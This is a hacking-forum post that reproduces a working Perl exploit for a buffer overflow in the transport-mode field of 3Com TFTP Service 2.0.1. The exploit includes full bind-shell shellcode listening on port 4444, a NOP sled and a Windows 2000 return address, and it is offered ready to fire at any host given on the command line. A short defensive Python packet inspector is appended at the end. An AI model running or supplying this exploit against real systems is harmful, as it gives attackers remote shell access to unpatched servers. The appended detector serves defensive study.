Hacking and more...
Exploits and POCs / 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)

Posted by snark (Grand Master; registered 17 years ago; 207 posts)

Code:

#!/usr/bin/perl -w
# ===============================================================================================
#                3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
#                               By Umesh Wanve ( )
# ==============================================================================================
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
#
# Reference : http://www.securityfocus.com/bid/21301
#
# Date : 27-02-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in transporting mode name of TFTP server.
#
# So here you go.
#
# Buffer = "\x00\x02"      +  "filename"    +  "\x00" +  nop sled +  Shellcode + JUMP  + "\x00";
#
#
# This was written for educational purpose. Use it at your own risk. Author will not be responsible for any damage.
#
# #
#===============================================================================================
use strict;
use IO::Socket;

if (@ARGV < 2)
{
    print "\n3COM Tftp long transport name exploit\n";
    print "\tCoded by Umesh wanve\n\n";
    print "Use: 3com_tftp.pl <host> <port>\n\n";
    exit;
}

my ($host, $port) = @ARGV;

# UDP socket: "connecting" only fixes the destination, no handshake takes place
my $target = IO::Socket::INET->new(Proto    => 'udp',
                                   PeerAddr => $host,
                                   PeerPort => $port)
    or die "Cannot connect to $host on port $port: $!";

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9c\x97\x7c".
"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x17\xd4\xb2\xbf".
"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\xc3\x8b\x83\xdf".
"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x06\xc6\x5f\x04".
"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x17\x9c\x4c\x84".
"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\xc9\x25\xbb\x56".
"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x9e\x9b\xe0\x07".
"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x2e\x9b\x3a\xb5".
"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x1d\x37\x63\x3c".
"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\xad\x81\x35\x1d".
"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x31\x0e\xca\x03".
"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\xc1\x2d\xd9\x04".
"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\xe2\x36\xf1\x79".
"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\xb6\x7b\xa5\xab".
"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x19\x99\xe6\x05".
"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\xb7\xff\x4c\x84".
"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\xb8\x42\xb7\x0b".
"\x1b\x37\x65\xab\x98\xc8\xb3\x54";

print "++ Building Malicious Packet .....\n";

my $nop = "\x90" x 129;                                      # NOP sled

my $jmp_2000 = "\x0e\x08\xe5\x77";                           # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)

my $exploit = "\x00\x02";                                    # write request (WRQ opcode, TFTP header)

$exploit .= "A";                                             # file name

$exploit .= "\x00";                                          # end of file name / start of transporting mode name

$exploit .= $nop;                                            # nop sled to land into shellcode

$exploit .= $shellcode;                                      # our Hell code

$exploit .= $jmp_2000;                                       # jump to shellcode

$exploit .= "\x00";                                          # end of TS mode name

$target->send($exploit) or die "Send failed: $!";            # Attack on victim

print "++ Exploit packet sent ...\n";

print "++ Done.\n";

print "++ Telnet to 4444 on victim's machine ....\n";
sleep(2);

close($target);

exit;

#------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-02-28]



posted 17 years ago
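As an added example that is not part of the original post: a small Python inspector, written from the defender's side, that parses a TFTP read/write request per RFC 1350 and flags a transport-mode field shaped like the packet built above (overlong, non-alphabetic, NOP-filled). The sample packets, the 64-byte threshold and the `inspect_request` / `parse_request` names are constructed for this example; the 344 filler bytes stand in for the shellcode.

```python
import struct

# RFC 1350 request layout: opcode(2) | filename | 0x00 | mode | 0x00
RRQ, WRQ = 1, 2
VALID_MODES = {"netascii", "octet", "mail"}
MAX_SANE_MODE_LEN = 64   # constructed threshold; the longest legitimate mode ("netascii") is 8 bytes


def parse_request(payload: bytes):
    """Parse a TFTP RRQ/WRQ and return (opcode, filename, mode); raise ValueError if malformed."""
    if len(payload) < 4:
        raise ValueError("too short for a TFTP request")
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode not in (RRQ, WRQ):
        raise ValueError(f"not a request opcode: {opcode}")
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:                      # filename, mode, and the trailing terminator
        raise ValueError("missing NUL terminators")
    return opcode, fields[0], fields[1]


def inspect_request(payload: bytes) -> list:
    """Return a list of findings for one request; an empty list means it looks well-formed."""
    try:
        opcode, filename, mode = parse_request(payload)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    findings = []
    if len(mode) > MAX_SANE_MODE_LEN:
        findings.append(f"mode field is {len(mode)} bytes (legitimate max is 8)")
    if not mode.isascii() or not mode.isalpha():
        findings.append("mode contains non-alphabetic or non-ASCII bytes")
    elif mode.decode().lower() not in VALID_MODES:
        findings.append(f"unknown mode {mode!r}")
    if b"\x90" * 8 in mode:                  # run of x86 NOPs inside a text field
        findings.append("NOP sled pattern inside mode field")
    return findings


# Constructed samples: a legitimate WRQ, and a WRQ laid out like the packet in the post
# (1-byte filename, 129 NOPs, 344 stand-in bytes, 4-byte address, terminator).
LEGIT_WRQ = b"\x00\x02" + b"config.bin" + b"\x00" + b"octet" + b"\x00"
OVERLONG_WRQ = (b"\x00\x02" + b"A" + b"\x00"
                + b"\x90" * 129 + b"\xcc" * 344 + b"\x0e\x08\xe5\x77" + b"\x00")

if __name__ == "__main__":
    for name, pkt in (("legit", LEGIT_WRQ), ("overlong", OVERLONG_WRQ)):
        print(name, inspect_request(pkt) or "ok")
```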